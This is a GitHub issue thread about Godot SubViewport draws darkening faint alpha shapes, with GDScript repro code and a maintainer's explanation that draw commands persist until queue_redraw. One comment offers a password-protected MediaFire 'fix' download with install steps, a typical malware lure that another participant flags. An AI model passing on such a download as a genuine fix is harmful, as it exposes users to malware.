### ISSUE TITLE
Subviewport exhibiting aberrant alpha behaviour on _draw()

### ISSUE THREAD

**Issue by Corso-1** [godotengine/godot#96151]
### Tested versions

Reproducable in v4.3.stable.official [77dcf97d8] & 4.2

### System information

Godot v4.3.stable - Windows 10.0.19045 - Vulkan (Forward+) - dedicated Radeon RX 5500 XT (Advanced Micro Devices, Inc.; 31.0.22011.4008) - AMD Ryzen 5 2600 Six-Core Processor (12 Threads)

### Issue description

Drawing a multiple lines onto the subviewport under faint alpha is correct until the last draw, where is appears to repeat-draw the same last entry of any line, circle or rectangle many times over. Causing faint colours to appear non transparent.

Example of how tyre skidding onto the Subview port leaves ultra black termination points when the skid is finished. There should be no termination points.
![Track Marks](https://github.com/user-attachments/assets/5f052104-0486-41fe-b15b-9bd7c580d44f)

I've tested by halting any _draw(): function (via bool) after a single draw call. Say, produce 1 faint black line after every delta(0.5) seconds. This actually makes it worse, as the program now believes every line is the last one and promptly draws it heavy black.

I've tested with extremely low alpha, and it appears as though it runs the _draw() function 'several times over'. Making faint black lines, darker. Thus, it is not slamming alpha = 1, but, alpha = alpha * (a number of itterations). ie: Color(1,1,1,0.001) might come out like Color(1,1,1,0.5). 

Below is a quick test of a mini program to isolate the issue. Code and Zip file provided.

![Mouse Test](https://github.com/user-attachments/assets/45c623a3-2c19-47de-b664-2496a23bff7a)

- As you slide the mouse and press the left button, it draws a set of faded rectangles, each is a different colour and alpha.
- When you let go of the mouse button, it stops drawing. (But keep moving the mouse).
- It is set by boolean value to stop drawing, so no further draws occur (when the mouse is released).
- The last Draw is always done many times over, this should not happen.

I am expecting zero change to alpha on the last draw function. 

### Steps to reproduce

Test bed setup.

Node setup:
![Setup 1](https://github.com/user-attachments/assets/ced30f59-d9e3-4493-8ac0-0f79f2cb643f)

Render Target to stay on
![Setup 2](https://github.com/user-attachments/assets/7fb9eb63-c525-4c8e-b637-d29726271b46)

Code is placed under the Control Node:

```gdscript
extends Control
# Allow the user to draw 
var Allow_Draw: bool = false
	
func _draw():
	# Do not draw the screen unless allowed to
	if Allow_Draw == true:
		# Get the Mouse position
		var MousePos: Vector2 = Vector2(get_global_mouse_position())
		# Draw 3 different squares of varying alpha
		draw_rect(Rect2(MousePos,Vector2(10,10)),Color(1,1,0,.05),true)
		draw_rect(Rect2(MousePos+Vector2(0,10),Vector2(10,10)),Color(1,1,1,.1),true)
		draw_rect(Rect2(MousePos+Vector2(0,20),Vector2(10,10)),Color(0,1,0,.2),true)
		# Do not allow it to draw again
		Allow_Draw = false

func _process(_delta):
	# On Mouse press
	if Input.is_mouse_button_pressed(MOUSE_BUTTON_LEFT):
		# Allow the Subviewport to allow drawing
		Allow_Draw = true
		# Run the draw process
		queue_redraw()
```

### Minimal reproduction project (MRP)

Mini Test GD Script

[subviewport-error-test.zip](https://github.com/user-attachments/files/16757677/subviewport-error-test.zip)

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Zireael07** [comment]
OP - comment above is highly likely malware

**Comment by Corso-1** [comment]
> OP - comment above is highly likely malware

Thanks, I recieved some weird email from "Student SAYNA". Looks like it was deleted.

**Comment by kleonc** [comment]
This is not a bug, it's a simple user error.

@Corso-1, you'd need to `queue_redraw()` once more after the mouse button is released, so the draw commands for this specific CanvasItem will be cleared, and the enqueued `_draw()` call will result in not adding any new commands because of `Allow_Draw == false`. Otherwise the CanvasItem is being redrawn using the last provided set of draw commands (3 rects in the MRP).

Your CanvasItem is being rendered every frame (as Viewport is being updated), it's not like it is drawn only after `queue_redraw()` is called. All `queue_redraw()` does is it clears draw commands for the given CanvasItem, and it triggers drawing routine which includes: `NOTIFICATION_DRAW`, `draw` signal, `_draw` method override (e.g. built-in nodes issue their draw commands on `NOTIFICATION_DRAW`).

https://github.com/godotengine/godot/blob/db76de5de8a415b29be4c7dd84b99bd0fe260822/scene/main/canvas_item.cpp#L132-L151

---

A little simplified (and "fixed") script from the MRP:
```gdscript
extends Control

func _draw() -> void:
	var MousePos: Vector2 = get_local_mouse_position() # <-- `draw_x` methods expect local coordinates

	draw_rect(Rect2(MousePos,Vector2(10,10)),Color(1,1,0,.05),true)
	draw_rect(Rect2(MousePos+Vector2(0,10),Vector2(10,10)),Color(1,1,1,.1),true)
	draw_rect(Rect2(MousePos+Vector2(0,20),Vector2(10,10)),Color(0,1,0,.2),true)

func _process(_delta: float) -> void:
	visible = Input.is_mouse_button_pressed(MOUSE_BUTTON_LEFT)
	if visible:
		queue_redraw()
```
Here I didn't need to `queue_redraw()` once more after a mouse release because I'm hiding the CanvasItem instead keeping it visible but with zero draw commands.

---

Seems like the documentation might need to be improved.

**Comment by Corso-1** [comment]
Hi Kleonc, thank you muchly for the detailed explanation. Being a newb I'm completely lost for a few things. Greatly appreciated.

Though, I've been testing again, but am not sure of the best case for when you 'emit' a signal to activate the draw.

For example: Regarding the skidding tyres. I emit a signal to the control to draw lines.
Basically:
If Grippy_Slide > 5:
 Skidding.emit(body)

From there the Control picks up the car body and figures out tyre position, length of line etc. then asks the _draw() function to draw it in. 

So, the skidding for the driver and all the NPC cars occurs only when above a threshold. (Which currently produces heavy termination points).

What does one do in this kind of case? I've been wracking my brain, but no clean solution is apparent, unless I tell it to update the subviewport each cycle, as in, queue_redraw even if nothing is sent (empty skid). Is that what we have to do?

**Comment by kleonc** [comment]
@Corso-1 This is a bugtracker, not a helpdesk. For asking this type of help questions please use other [community channels](https://godotengine.org/community/), e.g. [Godot Forum](https://forum.godotengine.org/). Sorry but we don't want users to ask here _"How do I implement X in my project?"_ etc., such questions do not belong here.

But since you present yourself as "a newb", I got to praise you: this issue report is super clear. Easy to undersand the issue, your setup, your expectations, etc. If you'd ask for help about your project-specific issues on the Godot Forum etc., with a similar amount of details, then I'm quite sure you'll get the help you're looking for. So thank you for a clear report, and good luck with the project! :slightly_smiling_face:

---

Regarding:

> What does one do in this kind of case? I've been wracking my brain, but no clean solution is apparent, unless I tell it to update the subviewport each cycle, as in, queue_redraw even if nothing is sent (empty skid). Is that what we have to do?

Note that you currently do update the subviewport always, you have set `render_target_update_mode = SubViewport.UPDATE_ALWAYS` (via the inspector). So you update even when you do not `queue_redraw()` items within such subviewport (that's why you had this issue in the first place: you didn't clear the draw commands and the subviewport kept updating).

There's of course no need to always-update a non-clearing subviewport. You could instead set it initially to `render_target_update_mode = SubViewport.UPDATE_NEVER`, and anytime you want something to be drawn in such subviewport you'd set `render_target_update_mode = SubViewport.UPDATE_ONCE`, so draw will happen only the next frame (after which it will auto swap to `render_target_update_mode = SubViewport.UPDATE_NEVER`).

How you'll tell the drawing CanvasItem what/how needs to be drawn is totally up to you (whether you'd use some global reference (and direct calls), or signals (e.g. an event bus), or whatever else).

**Comment by Corso-1** [comment]
OK, gotcha. I'll try again there if I can't get any further with testing. Many, many thanks again for the detail. 
I definitely think other newbs like me are going to hit a bump with the documentation and the subviewport. It's simplicity in use initially belies it's overall function. 
If they do, I hope they add in little picture-states of how things work. We illiterate Godot peasants work well with pictures. 
*bowing clasps hands* Thanks! *bowing* thank you Godot Guru.

**Comment by kleonc** [comment]
> (Edit: Do I close this thread somehow?)

No, for some reason you were thinking it should work this way, so there's likely related documentation which needs to be improved. E.g.: reading `CanvasItem.queue_redraw` docs I'd say it could be clearer about what it's doing:
https://github.com/godotengine/godot/blob/ce8a837aab2568f9cdc41b4b410c478b0cd711fc/doc/classes/CanvasItem.xml#L552-L556

Also maybe some things in SubViewport docs etc.

This issue will be linked in a PR with such improvements, and it will be auto closed after such changes will be merged in. Meaning you don't need to do anything more about it. :slightly_smiling_face:

---

> I definitely think other newbs like me are going to hit a bump with the documentation and the subviewport. It's simplicity in use initially belies it's overall function.
> If they do, I hope they add in little picture-states of how things work. We illiterate Godot peasants work well with pictures.

Note that in the main repo (here, https://github.com/godotengine/godot) there's only documentation for class reference (the one you can check in the editor). It doesn't support images currently, but sometimes there are links to images added ([e.g. for `Vector2.angle` method](https://docs.godotengine.org/en/4.3/classes/class_vector2.html#class-vector2-method-angle)).

The manuals/tutorials etc. part of the on-line docs are in the https://github.com/godotengine/godot-docs repo. There you have more images. If you have specific suggestions on improving some of the existing docs, adding new sections, etc. you could report it in there.

**Comment by Corso-1** [comment]
Ah, sorry! I clicked the button by mistake.
